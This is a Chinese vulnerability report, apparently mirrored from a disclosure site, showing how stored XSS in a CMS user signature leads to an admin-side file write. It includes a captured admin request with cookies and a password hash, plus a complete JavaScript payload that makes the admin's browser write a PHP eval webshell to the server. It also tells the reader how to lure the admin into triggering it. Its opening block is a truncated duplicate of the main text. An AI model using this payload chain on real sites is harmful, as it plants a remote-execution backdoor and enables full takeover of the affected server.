VULHUB ™

### 简要描述： 插入 构造的js 可 getshell ### 详细说明： user/space.php?ac=edit&op=zl 修改 签名处，没有 任何过滤。xss产生 后台 看了下 可以写任意格式文件。。 抓包。。 POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://127.0.0.1/admin/skins/skins.php?ac=xgmb&path=../../skins/index/html/&name=aaa.php Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: 127.0.0.1 Content-Length: 38 DNT: 1 Connection: Keep-Alive Cache-Control: no-cache Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b;...

### 简要描述： 插入 构造的js 可 getshell ### 详细说明： user/space.php?ac=edit&op=zl 修改 签名处，没有 任何过滤。xss产生 后台 看了下 可以写任意格式文件。。 抓包。。 POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://127.0.0.1/admin/skins/skins.php?ac=xgmb&path=../../skins/index/html/&name=aaa.php Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: 127.0.0.1 Content-Length: 38 DNT: 1 Connection: Keep-Alive Cache-Control: no-cache Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594 name=aaa.php&content=%3Cs%3E%3Ca%25%3E 于是 构造js如下。 ``` <script> thisTHost = top.location.hostname;thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";function PostSubmit(url, data, msg) { var postUrl = url; var postData = data; var msgData = msg; var ExportForm = document.createElement("FORM"); document.body.appendChild(ExportForm); ExportForm.method = "POST"; var newElement = document.createElement("input"); newElement.setAttribute("name", "name"); newElement.setAttribute("type", "hidden"); var newElement2 = document.createElement("input"); newElement2.setAttribute("name", "content"); newElement2.setAttribute("type", "hidden"); ExportForm.appendChild(newElement); ExportForm.appendChild(newElement2); newElement.value = postData; newElement2.value = msgData; ExportForm.action = postUrl; ExportForm.submit(); };PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>"); ``` 插入 签名处 用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2（uid自己改） 就会 在 skins\index\html\目录下生成 roker.php 一句话。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201310/17235510517fa700c488456facccdc0ea6d23909.jpg" alt="QQ图片20131017235131.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/17235510517fa700c488456facccdc0ea6d23909.jpg)